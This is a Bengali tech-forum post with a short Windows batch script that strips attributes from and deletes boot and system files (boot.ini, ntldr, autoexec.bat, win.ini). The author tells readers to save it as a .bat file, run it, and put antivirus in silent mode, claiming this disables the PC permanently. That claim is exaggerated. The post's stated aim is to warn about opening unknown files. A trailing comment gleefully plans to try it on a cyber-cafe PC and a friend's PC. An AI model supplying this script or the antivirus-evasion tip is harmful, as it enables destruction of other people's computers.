সবাইকে রমজানুল মুবারকের শুভেচ্ছা । আশা করি সকলে ভাল আছেন ।
দীর্ঘ এক মাস পর আবর আবার আপনাদের মাঝে একটি টিউন করলাম । চেয়েছলিামি একটি বড় টিউন করব । কিন্তু সারাদিন রোজা রাখার পর তা পারলামনা । তাই খুব ছোট একটি টউন করলাম । শিরনামটি পরে হয়ত বুঝতে পেরেছেন ব্যাপারটি কি হবে ।
প্রথমে একটি নোটপ্যাড ওপেন করে তাতে নিচের কোডটুকু কপি করে পেষ্ট করুন এবং .bat file নামে সেভ করুন । ব্যাস কাজ শেষ । এবার ফাইলটিতে ডাবল ক্লিক করলেই কম্পিউটারটি চিরদিনের জন্য বন্ধ হয়ে যাবে ।
--------------------------------------------------
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
------------------------------------------------------
এখন আপনাদের মাঝে প্রশ্ন আসতে পারে টিউনটি করলাম কেন ?
উত্তর : সকল বিষয়ের উপর মানুষের ধারনা থাকা উচিত । হয়ত এমন একটি নোটপ্যাড কেউ আপনাকে মেইল করে পাঠাতে পারে । তাই অজানা কোন নোটপ্যাড কখনও ওপেন করবেন না ।
বি:দ্র: কাজটি করার সময় পিসির এন্টিভাইরাস সাইলেন্ট মুড করে নিবেন ।
সকলে ভাল থাকবেন .........................বাপ্পী পটুয়াখালী
আমি বাপ্পী পটুয়াখালী। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 15 বছর যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 19 টি টিউন ও 136 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 1 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।
বিশ্বজোড়া পাঠশালা মোর সবার আমি ছাত্র,নানানভাবে নতুন জিনিস শিখছি দিবারাত্র এই পৃথিবীর বিরাট খাতায়,পাঠ্য যে সব পাতায় পাতায় শিখছি সেসব কৌতূহলে সন্দেহ নেই মাত্র
ভালো কাজে লাগবে। সাইবার ক্যাফের একটা পিসি দেখি বন্ধ হয় কি না। পরে আমার এক বন্ধুর টা হে। হে। হে। হে।খুক খুক………